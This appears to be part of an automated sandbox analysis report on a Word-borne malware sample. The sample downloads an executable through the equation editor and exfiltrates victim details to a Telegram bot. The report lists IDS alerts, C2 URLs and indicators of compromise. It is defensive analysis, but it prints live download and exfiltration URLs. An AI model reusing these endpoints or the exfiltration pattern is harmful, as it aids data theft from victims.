                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163

                Networking

                Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 66.63.187.123:80 -> 192.168.2.22:49163
                Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 66.63.187.123:80 -> 192.168.2.22:49163
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Thu, 26 Sep 2024 07:25:01 GMTContent-Type: application/x-msdos-programContent-Length: 704000Connection: keep-aliveLast-Modified: Thu, 26 Sep 2024 03:29:52 GMTETag: "abe00-622fd59fdddc0"Accept-Ranges: bytes
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:609290%0D%0ADate%20and%20Time:%209/27/2024%20/%2010:16:15%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20609290%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49167 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49164 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49173 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficHTTP traffic detected: GET /txt/HgCppsoKmxQq.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.123Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2467304B-9A7F-4216-A178-345DF60D02BC}.tmp
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 07:25:40 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: ncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000003.383078527.00000000002D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.383201670.00000000002D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.383161486.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/HgCppsoKmxQq.exe
                Source: EQNEDT32.EXE, 00000002.00000003.383078527.00000000002D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.383201670.00000000002D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/HgCppsoKmxQq.exeflC:
                Source: EQNEDT32.EXE, 00000002.00000002.383161486.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/HgCppsoKmxQq.exej
                Source: EQNEDT32.EXE, 00000002.00000002.383161486.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/HgCppsoKmxQq.exeqqC:
                Source: ncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: ncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000261E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025D9000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000260B000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025B4000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025D9000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000260B000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025B4000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002521000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002512000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: ncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: ncfplgpeter20306.exe, 00000009.00000002.908145978.0000000005C70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: ncfplgpeter20306.exe, 00000009.00000002.908145978.0000000005C70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025D9000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000260B000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000253A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: ncfplgpeter20306.exe, 00000005.00000002.393368543.0000000002187000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: ncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000261E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: ncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000261E000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000261E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000261E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:609290%0D%0ADate%20a
